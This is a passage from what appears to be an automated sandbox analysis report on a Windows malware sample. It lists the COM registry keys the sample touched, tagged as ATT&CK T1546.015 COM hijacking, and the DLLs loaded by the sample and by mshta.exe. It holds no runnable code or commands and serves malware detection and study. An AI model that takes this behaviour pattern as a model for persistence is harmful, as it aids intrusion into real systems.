\"HKCU\\CLSID\\{9CFC2DF3-6BA3-46EF-A836-E519E81F0EC4}\\TREATAS\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"CLSID_ResultSetFactory\" (Path: \"HKCU\\CLSID\\{30276B4F-F25C-457C-A4B7-08574F8EA528}\\TREATAS\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"FormatForDisplay Helper\" (Path: \"HKCU\\CLSID\\{82C588E7-E54B-408C-9F8C-6AF9ADF6F1E9}\\TREATAS\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"ShellItem Shell Namespace helper\" (Path: \"HKCU\\CLSID\\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\\TREATAS\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"HTML Document\" (Path: \"HKCU\\CLSID\\{25336920-03F9-11CF-8FD0-00AA00686F13}\\IMPLEMENTED CATEGORIES\\{00021490-0000-0000-C000-000000000046}\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"Display\" (Path: \"HKCU\\CLSID\\{C555438B-3C23-4769-A71F-B6D3D9B6053A}\\SHELLFOLDER\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"LayoutFolder\" (Path: \"HKCU\\CLSID\\{328B0346-7EAF-4BBE-A479-7CB88A095F5B}\\INPROCSERVER32\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"WBEM Locator\" (Path: \"HKCU\\CLSID\\{4590F811-1D3A-11D0-891F-00AA004B2E24}\\TREATAS\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"Windows Management and Instrumentation\" (Path: \"HKCU\\CLSID\\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\\TREATAS\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"PSFactoryBuffer\" (Path: \"HKCU\\CLSID\\{7C857801-7381-11CF-884D-00AA004B2E24}\\TREATAS\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"Microsoft WBEM (non)Standard Marshaling for IWbemServices\" (Path: \"HKCU\\CLSID\\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\\TREATAS\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"Microsoft WBEM (non)Standard Marshaling for IEnumWbemClassObject\" (Path: \"HKCU\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\TREATAS\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"SpVoice Class\" (Path: \"HKCU\\CLSID\\{96749377-3391-11D2-9EE3-00C04F797396}\\TREATAS\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"SpObjectTokenCategory Class\" (Path: \"HKCU\\CLSID\\{A910187F-0C7A-45AC-92CC-59EDAFB77B53}\\TREATAS\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"SpDataKey Class\" (Path: \"HKCU\\CLSID\\{D9F6EE60-58C9-458B-88E1-2F908FD7F87C}\\TREATAS\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"SpResourceManager Class\" (Path: \"HKCU\\CLSID\\{96749373-3391-11D2-9EE3-00C04F797396}\\TREATAS\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"SpTaskManager Class\" (Path: \"HKCU\\CLSID\\{4C6F940C-3CFE-11D2-9EE7-00C04F797396}\\TREATAS\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"MMDeviceEnumerator class\" (Path: \"HKCU\\CLSID\\{BCDE0395-E52F-467C-8E3D-C4579291692E}\\TREATAS\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"SpObjectToken Class\" (Path: \"HKCU\\CLSID\\{EF411752-3736-4CB4-9C8C-8EF4CCB58EFE}\\TREATAS\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"MS TTSEngine Class\" (Path: \"HKCU\\CLSID\\{F51C7B23-6566-424C-94CF-2C4F83EE96FF}\\TREATAS\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"MSTTS Frontend Class (ENU)\" (Path: \"HKCU\\CLSID\\{55DFB4F7-4175-4B3B-B247-D9B399ADB119}\\TREATAS\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"MSTTS LTS Class\" (Path: \"HKCU\\CLSID\\{F66A6818-F490-431B-8CA4-4CFDA287327B}\\TREATAS\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"SpCompressedLexicon Class\" (Path: \"HKCU\\CLSID\\{90903716-2F42-11D3-9C26-00C04F8EF87C}\\TREATAS\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"SpLexicon Class\" (Path: \"HKCU\\CLSID\\{0655E396-25D0-11D3-9C26-00C04F8EF87C}\\TREATAS\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"SpUncompressedLexicon Class\" (Path: \"HKCU\\CLSID\\{C9E37C15-DF92-4727-85D6-72E5EEB6995A}\\TREATAS\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"SpPhoneticAlphabetConverter Class\" (Path: \"HKCU\\CLSID\\{4F414126-DFE3-4629-99EE-797978317EAD}\\TREATAS\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"SpObjectTokenEnum Class\" (Path: \"HKCU\\CLSID\\{3918D75F-0ACB-41F2-B733-92AA15BCECF6}\\TREATAS\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"SpPhoneConverter Class\" (Path: \"HKCU\\CLSID\\{9185F743-1143-4C28-86B5-BFF14F20E5C8}\\TREATAS\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"MSTTS DecObj Class\" (Path: \"HKCU\\CLSID\\{3F6B5E16-092A-41ED-930B-0B4125D91D4E}\\TREATAS\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"WMSpeech Decoder DMO\" (Path: \"HKCU\\CLSID\\{874131CB-4ECC-443B-8948-746B89595D20}\\TREATAS\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"SpMMAudioEnum Class\" (Path: \"HKCU\\CLSID\\{AB1890A0-E91F-11D2-BB91-00C04F8EE6C0}\\TREATAS\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"Windows Photo Viewer Image Verbs\" (Path: \"HKCU\\CLSID\\{FFE2A43C-56B9-4BF5-9A79-CC6D4285608A}\\SUPPORTEDPROTOCOLS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"MIDIMAP.DLL\" at base 6d110000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"ADVAPI32.DLL\" at base 768d0000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"CRYPT32.DLL\" at base 759a0000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"GDI32.DLL\" at base 766e0000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"GDIPLUS.DLL\" at base 742d0000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"KERNEL32.DLL\" at base 75f20000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"NTDLL\" at base 77a50000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"MPR.DLL\" at base 72000000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"NETAPI32.DLL\" at base 73f30000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"SAMCLI\" at base 73890000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"NETUTILS\" at base 73f20000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"NTDLL.DLL\" at base 77a50000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"OLE32.DLL\" at base 75dc0000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"OLEAUT32.DLL\" at base 77c00000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 75f20000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"POWRPROF.DLL\" at base 746a0000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"SHELL32.DLL\" at base 76e00000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"SHLWAPI.DLL\" at base 76320000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75ae0000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"URLMON.DLL\" at base 76980000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"USER32.DLL\" at base 76450000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"VERSION.DLL\" at base 74df0000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"WS2_32.DLL\" at base 76730000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"CRYPTSP.DLL\" at base 75360000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 750f0000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"CRYPTBASE.DLL\" at base 75850000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 747b0000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 75320000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74e80000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"DWMAPI.DLL\" at base 740d0000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"COMCTL32.DLL\" at base 74820000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"SETUPAPI.DLL\" at base 76520000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"RPCRT4.DLL\" at base 76820000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"CLBCATQ.DLL\" at base 75d30000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74470000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"NTMARTA.DLL\" at base 74dc0000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 77be0000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"PROFAPI.DLL\" at base 75960000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"PROPSYS.DLL\" at base 74470000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHELL32.DLL\" at base 76e00000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SEARCHFOLDER.DLL\" at base 6ab90000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"LINKINFO.DLL\" at base 6e970000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 77be0000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 758f0000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"APPHELP.DLL\" at base 75800000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHDOCVW.DLL\" at base 6e980000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"%WINDIR%\\WINSXS\\X86_MICROSOFT.WINDOWS.GDIPLUS_6595B64144CCF1DF_1.1.7601.23894_NONE_5C0BE957A009922E\\GDIPLUS.DLL\" at base 742d0000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"WINDOWSCODECS.DLL\" at base 73d00000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WBEM\\WBEMPROX.DLL\" at base 6dc30000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WBEM\\WBEMSVC.DLL\" at base 6e670000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WBEM\\FASTPROX.DLL\" at base 6e100000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"%WINDIR%\\SYSTEM32\\ICONCODECSERVICE.DLL\" at base 70a00000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 76980000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"SECUR32.DLL\" at base 75680000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 75980000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 70fa0000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75800000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"%PROGRAMFILES%\\WINDOWS PHOTO VIEWER\\PHOTOBASE.DLL\" at base 6d0f0000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"%PROGRAMFILES%\\WINDOWS PHOTO VIEWER\\PHOTOVIEWER.DLL\" at base 6aa20000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"%WINDIR%\\SYSTEM32\\OLEAUT32.DLL\" at base 77c00000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"%PROGRAMFILES%\\INTERNET EXPLORER\\IEPROXY.DLL\" at base 716e0000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SPEECH\\COMMON\\SAPI.DLL\" at base 68ca0000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MMDEVAPI.DLL\" at base 74660000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"CFGMGR32.DLL\" at base 75c60000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"%COMMONPROGRAMFILES%\\SPEECHENGINES\\MICROSOFT\\TTS20\\MSTTSENGINE.DLL\" at base 6a9f0000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"%COMMONPROGRAMFILES%\\SPEECHENGINES\\MICROSOFT\\TTS20\\EN-US\\MSTTSFRONTENDENU.DLL\" at base 6a9a0000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"%COMMONPROGRAMFILES%\\SPEECHENGINES\\MICROSOFT\\TTS20\\MSTTSCOMMON.DLL\" at base 6c5f0000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"SHFOLDER.DLL\" at base 6c5e0000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"%COMMONPROGRAMFILES%\\SPEECHENGINES\\MICROSOFT\\TTS20\\MSTTSDECWRP.DLL\" at base 6ca10000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WMSPDMOD.DLL\" at base 6a540000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"MFPLAT\" at base 6a940000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL\" at base 77be0000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"API-MS-WIN-SERVICE-WINSVC-L1-1-0.DLL\" at base 77be0000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"MMDEVAPI.DLL\" at base 74660000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"WDMAUD.DRV\" at base 6d570000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"%WINDIR%\\SYSTEM32\\DRPROV.DLL\" at base 74810000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NTLANMAN.DLL\" at base 72e50000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"%WINDIR%\\SYSTEM32\\DAVCLNT.DLL\" at base 72e30000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"WKSCLI.DLL\" at base 73f10000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"CSCAPI.DLL\" at base 70f90000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"NETUTILS.DLL\" at base 73f20000\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"BROWCLI.DLL\" at base 68c00000\n \"mshta.exe\" loaded module \"ADVAPI32.DLL\" at base 768d0000\n \"mshta.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-OLE32-L1-1-0.DLL\" at base 75ad0000\n \"mshta.exe\" loaded module \"CRYPTBASE.DLL\" at base 75850000\n \"mshta.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75ae0000\n \"mshta.exe\" loaded module \"URLMON.DLL\" at base 76980000\n \"mshta.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSHTML.DLL\" at base 68dd0000\n \"mshta.exe\" loaded module \"OLE32.DLL\" at base 75dc0000\n \"mshta.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 747b0000\n \"mshta.exe\" loaded module \"DWMAPI.DLL\" at base 740d0000\n \"mshta.exe\" loaded module \"SHLWAPI.DLL\" at base 76320000\n \"mshta.exe\" loaded module \"KERNEL32.DLL\" at base 75f20000\n \"mshta.exe\" loaded module \"CLBCATQ.DLL\" at base 75d30000\n \"mshta.exe\" loaded module \"UXTHEME.DLL\" at base 747b0000\n \"mshta.exe\" loaded module \"COMCTL32.DLL\" at base 74820000\n \"mshta.exe\" loaded module \"SECUR32.DLL\" at base 75680000\n \"mshta.exe\" loaded module \"RPCRT4.DLL\" at base 76820000\n \"mshta.exe\" loaded module \"OLEAUT32.DLL\" at base 77c00000\n \"mshta.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L2-1-0.DLL\" at base 724a0000\n \"mshta.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 75980000\n \"mshta.exe\" loaded module \"SHELL32.DLL\" at base 76e00000\n \"mshta.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 70fa0000\n \"mshta.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSIMTF.DLL\" at base 6c450000\n \"mshta.exe\" loaded module \"USER32.DLL\" at base 76450000\n \"mshta.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 77be0000\n \"mshta.exe\" loaded module \"CRYPTSP.DLL\" at base 75360000\n \"mshta.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 750f0000\n \"mshta.exe\" loaded module \"%WINDIR%\\SYSTEM32\\OLE32.DLL\" at base 75dc0000\n \"mshta.exe\" loaded module \"OLEACC.DLL\" at base 6c0e0000\n \"mshta.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 758f0000\n \"mshta.exe\" loaded module \"%WINDIR%\\SYSTEM32\\OLEAUT32.DLL\" at base 77c00000\n \"mshta.exe\" loaded module \"SXS.DLL\" at base 75860000\n \"mshta.exe\" loaded module \"%WINDIR%\\SYSTEM32\\OLEACC.DLL\" at base 6c0e0000\n \"mshta.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSCTF.DLL\" at base 76380000\n \"mshta.exe\" loaded module \"MSHTML.DLL\" at base 68dd0000\n \"mshta.exe\" loaded module \"D2D1.DLL\" at base 656e0000\n \"mshta.exe\" loaded module \"DWRITE.DLL\" at base 655a0000\n \"mshta.exe\" loaded module \"DXGI.DLL\" at base 71c50000\n \"mshta.exe\" loaded module \"%WINDIR%\\SYSTEM32\\DXGIDEBUG.DLL\" at base 0\n \"mshta.exe\" loaded module \"GDI32.DLL\" at base 766e0000\n \"mshta.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 75f20000\n \"mshta.exe\" loaded module \"SETUPAPI.DLL\" at base 76520000\n \"mshta.exe\" loaded module \"WINTRUST.DLL\" at base 75af0000\n \"mshta.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 77be0000\n \"mshta.exe\" loaded module \"PROFAPI.DLL\" at base 75960000\n \"mshta.exe\" loaded module \"XMLLITE.DLL\" at base 74070000\n \"mshta.exe\" loaded module \"D3D11.DLL\" at base 71a10000\n \"mshta.exe\" loaded module \"D3D10WARP.DLL\" at base 653b0000\n \"mshta.exe\" loaded module \"%WINDIR%\\SYSTEM32\\D3D10WARP.DLL\" at base 653b0000\n \"mshta.exe\" loaded module \"%WINDIR%\\SYSTEM32\\JSCRIPT9.DLL\" at base 64f50000\n \"mshta.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IEFRAME.DLL\" at base 6ac30000\n \"mshta.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WBEM\\WBEMDISP.DLL\" at base 6c9c0000\n \"mshta.exe\" loaded module \"%WINDIR%\\SYSTEM32\\ADVAPI32.DLL\" at base 768d0000\n \"mshta.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WBEM\\WBEMPROX.DLL\" at base 6dc30000\n \"mshta.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WBEM\\WMIUTILS.DLL\" at base 6d4a0000\n \"mshta.exe\" loaded module \"MLANG.DLL\" at base 6c460000\n \"mshta.exe\" loaded module \"WININET.DLL\" at base 76ad0000\n \"mshta.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WBEM\\WBEMSVC.DLL\" at base 6e670000\n \"mshta.exe\" loaded module \"PROPSYS.DLL\" at base 74470000\n \"mshta.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WBEM\\FASTPROX.DLL\" at base 6e100000\n \"mshta.exe\" loaded module \"API-MS-WIN-CORE-WINRT-L1-1-0.DLL\" at base 0\n \"mshta.exe\" loaded module \"MSLS31.DLL\" at base 6e860000\n \"mshta.exe\" loaded module \"CRYPT32.DLL\" at base 759a0000\n \"mshta.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WINDOWSCODECS.DLL\" at base 73d00000\n \"mshta.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSXML3.DLL\" at base 6a7d0000\n \"mshta.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 76980000\n \"mshta.exe\" loaded module \"WS2_32.DLL\" at base 76730000\n \"mshta.exe\" loaded module \"WINHTTP.DLL\" at base 71430000\n \"mshta.exe\" loaded module \"IPHLPAPI.DLL\" at base 73cb0000\n \"mshta.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 75320000\n \"mshta.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHIP6.DLL\" at base 75310000\n \"mshta.exe\" loaded module \"DNSAPI.DLL\" at base 751e0000\n \"mshta.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NETPROFM.DLL\" at base 6d5a0000\n \"mshta.exe\" loaded module \"DHCPCSVC6.DLL\" at base 73bc0000\n \"mshta.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74e80000\n \"mshta.exe\" loaded module \"RASADHLP.DLL\" at base 71ff0000\n \"mshta.exe\" loaded module \"DHCPCSVC.DLL\" at base 73b50000\n \"mshta.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NPMPROXY.DLL\" at base 6d230000\n \"mshta.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WININET.DLL\" at base 76ad0000\n \"mshta.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 73be0000\n \"mshta.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WS2_32\" at 